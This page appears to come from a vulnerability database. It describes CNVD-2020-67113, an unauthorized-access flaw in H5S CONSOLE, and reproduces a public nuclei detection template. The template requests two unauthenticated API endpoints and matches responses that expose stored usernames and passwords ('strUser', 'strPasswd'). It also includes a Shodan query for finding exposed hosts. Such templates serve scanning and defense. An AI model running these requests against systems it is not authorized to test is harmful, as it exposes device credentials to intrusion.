CNVD-2020-67113: H5S CONSOLE - Unauthorized Access

日期: 2025-08-01 | 影响软件: H5S CONSOLE | POC: 已公开

漏洞描述

H5S CONSOLE is susceptible to an unauthorized access vulnerability.

PoC代码[已公开]

id: CNVD-2020-67113

info:
  name: H5S CONSOLE - Unauthorized Access
  author: ritikchaddha
  severity: medium
  description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
  reference:
    - https://vul.wangan.com/a/CNVD-2020-67113
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-425
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"H5S CONSOLE"
  tags: cnvd,cnvd2020,h5s,unauth,h5sconsole,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v1/GetSrc"
      - "{{BaseURL}}/api/v1/GetDevice"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'strUser'
          - 'strPasswd'
        condition: and

      - type: word
        part: body
        words:
          - 'H5_AUTO'
          - 'H5_DEV'
        condition: or

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207b06b5c53aab70b41fdecf376793e54395c141f539dfa6d2a6437df188aa692702210096ec8ed29ac346bf1e815b24b85684769f4aa7f31e8ab038b0f801aa62f4df53:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cnvd/2020/CNVD-2020-67113.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐